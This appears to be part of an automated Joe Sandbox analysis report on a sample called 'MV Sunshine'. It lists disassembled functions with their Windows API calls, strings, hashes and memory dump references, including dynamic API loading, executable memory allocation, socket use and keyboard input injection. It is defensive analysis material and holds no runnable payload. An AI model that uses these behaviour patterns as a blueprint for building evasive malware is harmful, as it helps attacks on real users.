Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 42223f82a27a3128eb1bb228dafae16afde976230236f35fef155ca7d3dfb134
Instruction ID: d875d1d18da2c57982a42b1054777f9ec921948c30e52f73483793fd5c9a435d
Opcode Fuzzy Hash: 42223f82a27a3128eb1bb228dafae16afde976230236f35fef155ca7d3dfb134
Instruction Fuzzy Hash: 4521D332500218BBDF11DF94CC42FEA3B6AEF49714F111214FE156B1D0D6B1AC518FA0

Function 006A6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 006A6FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006A6FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006A6FDF

Strings

Listbox, xrefs: 006A6F77

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 9f96ffb5b596894394bd26627b6e49efa1bdcbca3e08733232b93170026e3a64
Instruction ID: 733c3dfcd5635093ef3c241447764abd7b329acfda0fb5e519e8a397dcb9886f
Opcode Fuzzy Hash: 9f96ffb5b596894394bd26627b6e49efa1bdcbca3e08733232b93170026e3a64
Instruction Fuzzy Hash: A6216232610118BFDF11AF54EC85EFB37ABEF8A764F158128F9159B290C671AC518FA0

Function 006A797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006A79E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006A79F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 006A7A03

Strings

msctls_trackbar32, xrefs: 006A79B8

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: bdd89fcad17f50b2c064134b3bb4845567a711e2f9594da2241bb69602e14130
Instruction ID: cd83a99445b81b35309e63678f836804cee8c1c2ce5c001f8bcf6fee52ad991c
Opcode Fuzzy Hash: bdd89fcad17f50b2c064134b3bb4845567a711e2f9594da2241bb69602e14130
Instruction Fuzzy Hash: 2511C132244208BAEF10AF64CC05FEB77AAEF8A764F020529FA41A6191D271A811CF60

Function 00624C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00624C2E), ref: 00624CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00624CB5

Strings

GetNativeSystemInfo, xrefs: 00624CAF
kernel32.dll, xrefs: 00624C9E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 507309feb58cc85d65f1614859f6098a098d94e013c9649f78789e26ace82255
Instruction ID: 036a1a6e7a8d5df0a7509f2037b53fca6b7fe573698dbba228911cdd578dacb9
Opcode Fuzzy Hash: 507309feb58cc85d65f1614859f6098a098d94e013c9649f78789e26ace82255
Instruction Fuzzy Hash: 0ED01270610723CFD7206FB5DA58646B6E7AF06751B118839D886D6250DA70DC80CE61

Function 00624D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00624D2E,?,00624F4F,?,006E62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00624D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00624D81

Strings

Wow64DisableWow64FsRedirection, xrefs: 00624D7B
kernel32.dll, xrefs: 00624D6A

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 759da8abdfcca06438a02f04b2822610b8e62fc8ff8c67beed15debae626de3a
Instruction ID: 9c3e0df2402d4bf54f13a1c9689b30989ebbef1943ba93f56c1f7a442b177091
Opcode Fuzzy Hash: 759da8abdfcca06438a02f04b2822610b8e62fc8ff8c67beed15debae626de3a
Instruction Fuzzy Hash: D1D01270510723CFD7206F71D84865676EAAF16391B11DC3AD486D6350EA70D880CE61

Function 00624D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00624CE1,?), ref: 00624DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00624DB4

Strings

Wow64RevertWow64FsRedirection, xrefs: 00624DAE
kernel32.dll, xrefs: 00624D9D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 5762a3b56abe619b611d1cf063ee8d384e1c201dddb6427ab20a58d00f9fcc24
Instruction ID: 967aca19f3765d82ec1037469b22d1828f81fc4e7c96a11cafb3c229f92fad34
Opcode Fuzzy Hash: 5762a3b56abe619b611d1cf063ee8d384e1c201dddb6427ab20a58d00f9fcc24
Instruction Fuzzy Hash: 5ED01271550723CFD7306F71D84868676E6AF06355B11CC3AD8C5D6250EB70D880CE61

Function 006A1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,006A12C1), ref: 006A1080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006A1092

Strings

advapi32.dll, xrefs: 006A107B
RegDeleteKeyExW, xrefs: 006A108C

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: d9a4bff79280023152304a6b17cd4c069f5093bb8e3a183e6068a5119176a6c5
Instruction ID: b864369abc370ff02e4f45efd2cf951612ea78f0af0d9a55437250754e29dd7a
Opcode Fuzzy Hash: d9a4bff79280023152304a6b17cd4c069f5093bb8e3a183e6068a5119176a6c5
Instruction Fuzzy Hash: 06D0EC31910712CFD7206B75D96856A76E6AF06351B129C2AA4C5DA250DB70D8808A51

Function 006993F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00699009,?,006AF910), ref: 00699403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00699415

Strings

GetModuleHandleExW, xrefs: 0069940F
kernel32.dll, xrefs: 006993FE

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: a1dda171b4b13f891372c024076208e7b9bc569f238d5ee85fefdbb12fafa37b
Instruction ID: 477feada0314e17f04c34af51768cc23373a6528397fbffcba720f51605d2761
Opcode Fuzzy Hash: a1dda171b4b13f891372c024076208e7b9bc569f238d5ee85fefdbb12fafa37b
Instruction Fuzzy Hash: A5D01234514713CFDB306FB5D94854676EBAF26751B11C83ED485D6A50D670D880CB61

Function 006776C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ddc295d04edc00465aad524984119eca507cecd738de7c2aa9c8277b3c5e1d1
Instruction ID: a4fc8eaaa4c46c73d0365caaf851a8c74bf2b73d9d11cc28f78c2a010dc579df
Opcode Fuzzy Hash: 7ddc295d04edc00465aad524984119eca507cecd738de7c2aa9c8277b3c5e1d1
Instruction Fuzzy Hash: 4CC16E75A04216EFDB14CFA4C884EAEB7B6FF48714B1185A9E909EB351D730ED81CB90

Function 0069E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0069E3D2
CharLowerBuffW.USER32(?,?), ref: 0069E415

Part of subcall function 0069DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0069DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0069E615
_memmove.LIBCMT ref: 0069E628

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 76a222f0c6cc4e2af40766396faccba3a3fe541522413bec65b78186dd2dbe90
Instruction ID: b097295a26e853b58eaa8e1e9530256ff7866e5045f9f69dfed93818e03a6060
Opcode Fuzzy Hash: 76a222f0c6cc4e2af40766396faccba3a3fe541522413bec65b78186dd2dbe90
Instruction Fuzzy Hash: 78C18E71A083118FCB54DF28C48095ABBE6FF88714F14896EF8999B751D732E946CF82

Function 006983A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006983D8
CoUninitialize.OLE32 ref: 006983E3

Part of subcall function 0067DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0067DAC5

VariantInit.OLEAUT32(?), ref: 006983EE
VariantClear.OLEAUT32(?), ref: 006986BF

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: ed8dc226591f7daa3b3a762abb4e81db0d9c5e04af35167151542b42f5d5fdb3
Instruction ID: 37350d2769d0a60d61a1a9163388cc968a6160c2cc414d7ec2cc760e499e8214
Opcode Fuzzy Hash: ed8dc226591f7daa3b3a762abb4e81db0d9c5e04af35167151542b42f5d5fdb3
Instruction Fuzzy Hash: 75A16B75604B119FDB50DF14C481A2AB7EABF89324F08884DF99A9B7A1CB30EC44CF56

Function 00676DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00676E04
SysAllocString.OLEAUT32(00000000), ref: 00676EAD
VariantCopy.OLEAUT32 ref: 00676EDC
VariantClear.OLEAUT32(?), ref: 00676F03

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 2e30312899f9ccac44d863f70d037bfea5439acfcc4d68902ef930cd659ab4a5
Instruction ID: 6c216d8c7302e9e6fb39d5248d276d6b4cdce77eef8e167b3a5053edef2657f5
Opcode Fuzzy Hash: 2e30312899f9ccac44d863f70d037bfea5439acfcc4d68902ef930cd659ab4a5
Instruction Fuzzy Hash: DD51C8706087019ADB70AF75D891A6EB3E7AF49310F20D81FF59ECB292DB749880DB15

Function 006A9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00BCAF00,?), ref: 006A9AD2
ScreenToClient.USER32(00000002,00000002), ref: 006A9B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 006A9B72

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 2ecd416cb72034e2b1e6f580af8d5b5ff62bab3619cb8fdf2198fc4bb06e27f5
Instruction ID: d4aedc0e8d8409c035a863306756ec34341bd4c57dedfd9860edf1de5d945436
Opcode Fuzzy Hash: 2ecd416cb72034e2b1e6f580af8d5b5ff62bab3619cb8fdf2198fc4bb06e27f5
Instruction Fuzzy Hash: D351FB34A00649AFCF14EF58D8819EE7BB7EB56360F248559F9159B3A0D730AD41CFA0

Function 00696CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00696CE4
WSAGetLastError.WSOCK32(00000000), ref: 00696CF4

Part of subcall function 00629997: __itow.LIBCMT ref: 006299C2
Part of subcall function 00629997: __swprintf.LIBCMT ref: 00629A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00696D58
WSAGetLastError.WSOCK32(00000000), ref: 00696D64

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 932d3564bb92f67bcc4f3bf8532b15661b28e9d2d4695d7bc24a93d23d0f0a7a
Instruction ID: d2fa416fb39036a206056c8c06a84a8055f3ba63618914f0f1acac02efc4d38d
Opcode Fuzzy Hash: 932d3564bb92f67bcc4f3bf8532b15661b28e9d2d4695d7bc24a93d23d0f0a7a
Instruction Fuzzy Hash: 1841A574740710AFEB60AF24EC86F7A77EA9F48B10F44841CFA599B2D2DA719C018F55

Function 0069672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,006AF910), ref: 006967BA
_strlen.LIBCMT ref: 006967EC

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: fa620fa70de28ef34c6d3845e74e1ba3f31a7b58aadeb165c9ce3515a6576329
Instruction ID: 14488602eb2f9ee2a6c9fe15077bfa8b9e50176bf8ee17f6adc9331c50e62795
Opcode Fuzzy Hash: fa620fa70de28ef34c6d3845e74e1ba3f31a7b58aadeb165c9ce3515a6576329
Instruction Fuzzy Hash: 6341B531A00614ABCF54EBA4DDC5EBEB3AFAF44314F148169F81A9B291DB30AD01CB65

Function 0068BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0068BB09
GetLastError.KERNEL32(?,00000000), ref: 0068BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0068BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0068BB80

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 712f6fe2acf00d363a065d1a805c62dc246ca27ff4ea6aa61df6e9123ec18309
Instruction ID: 82f08568a7c939f296be7ff8d4d7fdf459354ad35d19ed819ae3e499ff46f093
Opcode Fuzzy Hash: 712f6fe2acf00d363a065d1a805c62dc246ca27ff4ea6aa61df6e9123ec18309
Instruction Fuzzy Hash: 63412B35600A20DFDB10EF15D585A59BBE2EF89320F09C488E84A9B762CB31FD41CFA5

Function 006A8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006A8B4D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 5ace80a9a586b18c99fc8ef3996eb1af19776d56a959b1d42a9cf3dd506abf2b
Instruction ID: ede7c012b079e4358d14ba940e5e57a31a875e0e462de7e7e392a3bdd703ddd5
Opcode Fuzzy Hash: 5ace80a9a586b18c99fc8ef3996eb1af19776d56a959b1d42a9cf3dd506abf2b
Instruction Fuzzy Hash: D031ADB4600214BEEB24BE58CC85BE937A7EB17310F244916FA51D73A1DF30AD408F61

Function 006AADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 006AAE1A
GetWindowRect.USER32(?,?), ref: 006AAE90
PtInRect.USER32(?,?,006AC304), ref: 006AAEA0
MessageBeep.USER32(00000000), ref: 006AAF11

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 4be7d7e8288940f754526821b563de76ea5234be82112842c01b81acad368f4d
Instruction ID: dffb5a15512ae02fd936a39f52f12c17c123b8460b93c8a096f0e840d10e7649
Opcode Fuzzy Hash: 4be7d7e8288940f754526821b563de76ea5234be82112842c01b81acad368f4d
Instruction Fuzzy Hash: 3A418070600215DFCB11EF98C884AA9BBF7FB8A340F1481AAE4148B351D731AC02DF62

Function 00680FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00681037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00681053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006810B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0068110B

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
